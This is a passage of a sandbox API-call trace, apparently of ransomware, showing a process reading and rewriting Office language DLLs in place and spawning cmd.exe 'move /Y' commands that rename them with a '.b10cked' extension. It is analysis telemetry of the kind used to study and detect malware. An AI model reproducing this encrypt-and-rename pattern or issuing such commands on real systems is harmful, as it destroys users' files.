CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x3c4, dwThreadId=0xff4)) returned 1 [0158.570] CloseHandle (hObject=0x1b4) returned 1 [0158.570] CloseHandle (hObject=0x114) returned 1 [0158.570] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.570] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.571] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.571] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21536084280) returned 1 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e78 [0158.573] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3360 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3360 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.642] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0158.656] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.656] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0158.656] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0158.656] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0158.657] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0158.657] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0158.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0158.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3360 [0158.662] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.662] CloseHandle (hObject=0x114) returned 1 [0158.663] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX") returned 0x3c [0158.664] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.666] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf80, dwThreadId=0x8b0)) returned 1 [0158.671] CloseHandle (hObject=0x1b4) returned 1 [0158.671] CloseHandle (hObject=0x114) returned 1 [0158.672] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.672] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.672] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21546661721) returned 1 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3c78 [0158.679] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4160 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4160 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.747] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x20af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x20af, lpOverlapped=0x0) returned 1 [0158.755] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.755] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x20af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x20af, lpOverlapped=0x0) returned 1 [0158.756] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8367, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x20b1 [0158.756] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x20af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x20af, 